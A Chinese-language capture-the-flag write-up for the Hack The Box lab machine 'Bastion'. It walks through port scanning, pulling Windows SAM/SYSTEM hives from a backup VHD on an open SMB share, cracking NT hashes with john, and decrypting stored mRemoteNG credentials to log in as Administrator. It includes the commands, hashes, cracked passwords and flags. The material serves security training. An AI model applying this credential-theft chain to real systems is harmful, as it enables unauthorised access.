目录
连接至HTB服务器并启动靶机
信息收集
使用rustscan对靶机TCP端口进行开放扫描
将靶机TCP开放端口号提取并保存
使用nmap对靶机TCP开放端口进行脚本、服务扫描
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
使用nmap对靶机常用UDP端口进行开放扫描
使用enum4linux对靶机SMB共享进行枚举
使用smbclient连接靶机Backups共享
边界突破
在Windows资源管理器地址栏中输入:\\10.10.10.134\Backups访问共享
使用7z打开体积更大一些的.vhd文件
尝试寻找该虚拟机的SAM、SYSTEM文件
分别右键这两个文件,将其复制到本地
使用samdump2对配置文件中的哈希密码进行提取
将哈希值写入文件中以便爆破
使用john对该哈希值进行字典爆破
使用上述凭证登录靶机SSH服务
权限提升
使用smbmap通过上述凭证对靶机SMB共享再次枚举
查看靶机内存在的用户
查看当前用户信息
查看当前用户特权
列出靶机安装的软件
询问大模型该软件将用户敏感信息都存哪了
回到当前用户主目录
列出当前目录所有文件
再次询问大模型,confCons.xml通常用来存储什么信息
通过Linux命令将该目录及其文件路径进行转换
将confCons.xml文件下载到本地
我尝试在Github上查找该软件的哈希解密工具
编辑
将其下载后,我首先查看该脚本使用手册
使用该凭证登录到靶机SSH服务
连接至HTB服务器并启动靶机
靶机IP:10.10.10.134
分配IP:10.10.16.13
信息收集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a 10.10.10.134 -r 1-65535 --ulimit 5000 | tee res
将靶机TCP开放端口号提取并保存
ports=$(grep '^[0-9]' res | cut -d/ -f1 | paste -sd,)┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep '^[0-9]' res | cut -d/ -f1 | paste -sd,
22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep '^[0-9]' res | cut -d/ -f1 | paste -sd,)
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670
使用nmap对靶机TCP开放端口进行脚本、服务扫描
nmap -sT -p$ports -sCV -Pn 10.10.10.134
- 需要重点关注的服务
22:SSH服务
445:SMB服务
5985:Win-RM服务
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p$ports --script=vuln -O -Pn 10.10.10.134
使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn 10.10.10.134
使用enum4linux对靶机SMB共享进行枚举
enum4linux -u 'root' -S 10.10.10.134 
- 由枚举结果可见,靶机Backups共享允许访问
使用smbclient连接靶机Backups共享
smbclient -N \\\\10.10.10.134\\Backups- 在主目录可见一个笔记文件note.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# smbclient -N \\\\10.10.10.134\\Backups
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Apr 16 06:02:11 2019
.. D 0 Tue Apr 16 06:02:11 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 20195638911 blocks of size 4096. 1177893 blocks available
- 将其下载并暂时退出SMB服务连接
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
- 查看该笔记内容
cat note.txt┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat note.txtSysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
翻译:系统管理员:请不要在本地传输整个备份文件,VPN到子公司太慢了。
- 在\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\目录下可见两个.vhd文件
在虚拟机技术中,.vhd(Virtual Hard Disk)是微软开发的一种虚拟硬盘文件格式,用于存储虚拟机的磁盘数据,像在 Hyper-V 等虚拟机环境中,它能完整模拟物理硬盘功能,保存操作系统、应用程序和用户数据 。
边界突破
在Windows资源管理器地址栏中输入:\\10.10.10.134\Backups访问共享
使用7z打开体积更大一些的.vhd文件
尝试寻找该虚拟机的SAM、SYSTEM文件
- SAM、SYSTEM默认存储路径:C:\Windows\System32\config
分别右键这两个文件,将其复制到本地
- 快捷键:对着文件右键后+按F5
使用samdump2对配置文件中的哈希密码进行提取
samdump2 SYSTEM SAM- 提取出来的哈希值
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::- 其中,Administrator、Guest都显示账户已停用,因此我们只需对L4mpje账户密码破解即可
将哈希值写入文件中以便爆破
echo 'L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::' > hash使用john对该哈希值进行字典爆破
john hash --wordlist=../dictionary/rockyou.txt --format=nt
账户:L4mpje
密码:bureaulampje
使用上述凭证登录靶机SSH服务
ssh L4mpje@10.10.10.134Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpjel4mpje@BASTION C:\Users\L4mpje>
- 在C:\Users\L4mpje\Desktop目录下可找到user.txt文件
l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\L4mpje\Desktop
22-02-2019 15:27 <DIR> .
22-02-2019 15:27 <DIR> ..
12-01-2025 08:10 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 4.824.010.752 bytes freel4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
8e22e1e1e830fe4474ae632dc76a1e56
权限提升
使用smbmap通过上述凭证对靶机SMB共享再次枚举
smbmap -u L4mpje -p bureaulampje -H 10.10.10.134
- 由输出可见,跟一开始使用root账户及其空密码枚举出来的共享没任何区别
查看靶机内存在的用户
net user
查看当前用户信息
net user L4mpje
- 可见该用户不属于任何特权组
查看当前用户特权
whoami /priv
- 切换到powershell
列出靶机安装的软件
ls "C:\Program Files (x86)"
- 由输出可见,靶机安装了mRemoteNG,这是一款开源的终端管理工具类似tabby、windterm等,因此该软件的登录历史很可能记录着靶机管理员凭证
询问大模型该软件将用户敏感信息都存哪了
回到当前用户主目录
cd ~列出当前目录所有文件
dir /a
- 由输出可见AppData目录,那就尝试直接进入%APPDATA%\mRemoteNG目录中
cd %APPDATA%\mRemoteNG
- 显然,该目录下以.xml结尾的文件及其备份都有可能存储着用户敏感信息
再次询问大模型,confCons.xml通常用来存储什么信息
- 存储用户认证?那就对了
通过Linux命令将该目录及其文件路径进行转换
echo -E 'L4mpje@10.10.10.134:C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml' | tr '\\' '/'┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo -E 'L4mpje@10.10.10.134:C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml' | tr '\\' '/'
L4mpje@10.10.10.134:C:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml
将confCons.xml文件下载到本地
scp L4mpje@10.10.10.134:C:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .- 查看该文件内容
cat confCons.xml<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6"><Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" /><Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>- 对该文件内容简单查看可得Administrator用户密码哈希
aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==- 这看起来不像任何我见过的密文
我尝试在Github上查找该软件的哈希解密工具
将其下载后,我首先查看该脚本使用手册
python mremoteng_decrypt.py -h
- 由输出可知,使用-s选项输入base64密文,尝试使用该工具进行密文破解
python mremoteng_decrypt.py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python mremoteng_decrypt.py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='
Password: thXLHM96BeKL0ER2
- 获得Administrator凭证
账户:Administrator
密码:thXLHM96BeKL0ER2
使用该凭证登录到靶机SSH服务
ssh Administrator@10.10.10.134Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator
- 在C:\Users\Administrator\Desktop目录下找到root.txt文件
